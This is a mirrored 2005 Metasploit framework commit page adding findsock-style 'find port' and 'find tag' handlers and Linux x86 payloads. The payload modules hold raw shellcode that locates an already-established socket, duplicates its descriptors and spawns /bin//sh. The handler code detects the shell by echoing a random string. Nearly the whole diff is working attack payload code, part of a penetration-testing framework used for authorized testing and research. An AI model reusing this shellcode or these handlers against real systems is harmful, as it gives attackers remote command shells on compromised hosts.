infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

find port/tag stagers 

git-svn-id: file:///home/svn/incoming/trunk@2799 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Matt Miller 2005-07-19 14:33:25 +00:00
parent 681eac7580
commit c494a71957
9 changed files with 329 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
lib/msf/base/sessions/command_shell.rb
View File

@ -25,12 +25,16 @@ class CommandShell
#
include Msf::Session::Provider::SingleCommandShell
def self.type
"shell"
end
def desc
"Command shell"
end
def type
"shell"
self.class.type
end
#

6
lib/msf/base/sessions/meterpreter.rb
View File

@ -36,6 +36,10 @@ class Meterpreter < Rex::Post::Meterpreter::Client
self.console = Rex::Post::Meterpreter::Ui::Console.new(self)
end
def self.type
"meterpreter"
end
##
#
# Msf::Session overrides
@ -47,7 +51,7 @@ class Meterpreter < Rex::Post::Meterpreter::Client
end
def type
"meterpreter"
self.class.type
end
##

116
lib/msf/core/handler/find_port.rb Normal file
View File

@ -0,0 +1,116 @@
module Msf
module Handler
###
#
# FindPort
# --------
#
# This handlers implements port-based findsock handling.
#
###
module FindPort
include Msf::Handler
def self.handler_type
return "find_port"
end
def initialize(info = {})
super
register_options(
[
Opt::CPORT(rand(64000) + 1024),
], Msf::Handler::FindPort)
end
#
# Check to see if there's a shell on the supplied sock. This check
# currently only works for shells.
#
def handler(sock)
_find_prefix(sock)
# Flush the receive buffer
sock.get(1)
# If this is a multi-stage payload, then we just need to blindly
# transmit the stage and create the session, hoping that it works.
if (self.payload_type != Msf::Payload::Type::Single)
handle_connection(sock)
# Otherwise, check to see if we found a session
else
create_session(sock)
end
return self._handler_return_value
end
protected
#
# Prefix to the stage if necessary.
#
def _find_prefix(sock)
end
#
# Wrapper to create session that makes sure we actually have a session to
# create...
#
def create_session(sock)
go = true
# Give the payload a chance to run
Rex::ThreadSafe.sleep(1.5)
# This is a hack. If the session is a shell, we check to see if it's
# functional by sending an echo which tells us whether or not we're good
# to go.
if (self.session.type == 'shell')
go = _check_shell(sock)
else
print_status("Trying to use connection...")
end
# If we're good to go, create the session.
rv = (go == true) ? super : nil
if (rv)
self._handler_return_value = Claimed
end
return rv
end
#
# Checks to see if a shell has been allocated on the connection. This is
# only done for payloads that use the CommandShell session.
#
def _check_shell(sock)
ebuf = Rex::Text.rand_text_alphanumeric(16)
# Check to see if the shell exists
sock.put("echo #{ebuf}\n")
# Try to read a response
rbuf = sock.get(3)
# If it contains our string, then we rock
if (rbuf =~ /#{ebuf}/)
print_status("Found shell...")
return true
else
return false
end
end
attr_accessor :_handler_return_value
end
end
end

53
lib/msf/core/handler/find_tag.rb Normal file
View File

@ -0,0 +1,53 @@
require 'msf/core/handler/find_port'
module Msf
module Handler
###
#
# FindTag
# -------
#
# This handlers implements tag-based findsock handling.
#
###
module FindTag
include FindPort
def self.handler_type
return "find_tag"
end
def initialize(info = {})
super
register_advanced_options(
[
OptString.new('TAG', [ true, "The four byte tag to signify the connection.", "msf!" ])
], Msf::Handler::FindTag)
end
protected
#
# Prefix the stage with this...
#
def _find_prefix(sock)
self.stage_prefix = _find_tag
end
#
# Returns the tag we'll be using.
#
def _find_tag
tag = (datastore['TAG'] || "msf!")
tag += ("\x01" * (tag.length - 4))
return tag[0, 4]
end
end
end
end

4
lib/msf/core/payload/stager.rb
View File

@ -52,8 +52,8 @@ module Msf::Payload::Stager
substitute_vars(p, stage_offsets) if (stage_offsets)
# Prefix to the stage with whatever may be required and then rock it.
p = (stage_prefix || '') + p
p = (self.stage_prefix || '') + p
print_status("Sending stage (#{p.length} bytes)")
# Send the stage

5
lib/msf/core/session.rb
View File

@ -52,6 +52,11 @@ module Session
require 'msf/core/session/provider/multi_command_execution'
require 'msf/core/session/provider/single_command_shell'
require 'msf/core/session/provider/multi_command_shell'
def self.type
"unknown"
end
#
# Returns the session's name if it's been assigned one, otherwise
# the sid is returned.

44
modules/payloads/singles/linux/x86/shell_find_port.rb Normal file
View File

@ -0,0 +1,44 @@
require 'msf/core'
require 'msf/core/handler/find_port'
require 'msf/base/sessions/command_shell'
module Msf
module Payloads
module Singles
module Linux
module X86
module ShellFindPort
include Msf::Payload::Single
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Find Port Inline',
'Version' => '$Revision$',
'Description' => 'Spawn a shell on an established connection',
'Author' => 'vlad902',
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::FindPort,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
{
'Offsets' =>
{
'CPORT' => [ 26, 'n' ],
},
'Payload' =>
"\x31\xd2\x52\x89\xe5\x6a\x07\x5b\x6a\x10\x54\x55" +
"\x52\x89\xe1\xff\x01\x6a\x66\x58\xcd\x80\x66\x81" +
"\x7d\x02\x11\x5c\x75\xf1\x5b\x6a\x02\x59\xb0\x3f" +
"\xcd\x80\x49\x79\xf9\x52\x68\x2f\x2f\x73\x68\x68" +
"\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b" +
"\xcd\x80"
}
))
end
end
end end end end end

52
modules/payloads/singles/linux/x86/shell_find_tag.rb Normal file
View File

@ -0,0 +1,52 @@
require 'msf/core'
require 'msf/core/handler/find_tag'
require 'msf/base/sessions/command_shell'
module Msf
module Payloads
module Singles
module Linux
module X86
module ShellFindTag
include Msf::Payload::Single
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Find Tag Inline',
'Version' => '$Revision$',
'Description' => 'Spawn a shell on an established connection (proxy/nat safe)',
'Author' => 'skape',
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::FindTag,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
{
'Offsets' =>
{
'TAG' => [ 0x1a, 'RAW' ],
},
'Payload' =>
"\x31\xdb\x53\x89\xe6\x6a\x40\xb7\x0a\x53\x56\x53\x89\xe1\x86\xfb" +
"\x66\xff\x01\x6a\x66\x58\xcd\x80\x81\x3e\x6d\x73\x66\x21\x75\xf0" +
"\x5f\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b" +
"\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52" +
"\x53\x89\xe1\xcd\x80"
}
))
end
#
# Ensures the setting of TAG to a four byte value
#
def generate
datastore['TAG'] = _find_tag
super
end
end
end end end end end

47
modules/payloads/stagers/linux/x86/find_tag.rb Normal file
View File

@ -0,0 +1,47 @@
require 'msf/core'
require 'msf/core/handler/find_tag'
module Msf
module Payloads
module Stagers
module Linux
module X86
###
#
# FindTag
# -------
#
# Linux find tag stager.
#
###
module FindTag
include Msf::Payload::Stager
def initialize(info = {})
super(merge_info(info,
'Name' => 'Find Tag Stager',
'Version' => '$Revision$',
'Description' => 'Use an established connection',
'Author' => 'skape',
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::FindTag,
'Stager' =>
{
'Offsets' =>
{
'TAG' => [ 0x1a, 'RAW' ],
},
'Payload' =>
"\x31\xdb\x53\x89\xe6\x6a\x40\xb7\x0a\x53\x56\x53\x89\xe1\x86\xfb" +
"\x66\xff\x01\x6a\x66\x58\xcd\x80\x81\x3e\x6d\x73\x66\x21\x75\xf0" +
"\x5f\xfc\xad\xff\xe6"
}
))
end
end
end end end end end